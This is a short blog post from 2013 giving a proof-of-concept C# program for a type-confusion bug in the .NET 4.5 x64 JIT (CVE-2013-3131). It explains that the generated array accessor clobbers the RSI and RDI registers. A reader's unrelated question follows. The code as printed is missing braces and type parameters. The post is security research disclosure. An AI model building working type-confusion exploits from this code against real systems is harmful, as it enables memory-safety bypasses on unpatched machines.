# Wednesday, 10 July 2013
« Overriding a Final Finalize | Main | Java Method Overriding Is FUBAR Part 7 o... »
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

using System;
using System.Runtime.CompilerServices;

struct Foo {
  byte b1, b2, b3;

class U1 { }
class U2 { }

struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);

  object Get(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    object v = arr[0, 0];
    field2 = field1;
    return v;

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the array accessor that is generated clobbers the RSI and RDI registers.

Wednesday, 10 July 2013 13:05:47 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
Tuesday, 01 October 2013 11:29:59 (W. Europe Daylight Time, UTC+02:00)
Hi, I try use IKVMC and success convert Java to c#, but I have problems when use rxtx library. " Attempt to get long field "gnu.io.RXTXPort.eis" with illegal data type conversion to int" when try read Input stream from port. Please help me if you can.
Home page

I apologize for the lameness of this, but the comment spam was driving me nuts. In order to be able to post a comment, you need to answer a simple question. Hopefully this question is easy enough not to annoy serious commenters, but hard enough to keep the spammers away.

Anti-Spam Question: What method on java.lang.System returns an object's original hashcode (i.e. the one that would be returned by java.lang.Object.hashCode() if it wasn't overridden)? (case is significant)

Comment (HTML not allowed)  

Live Comment Preview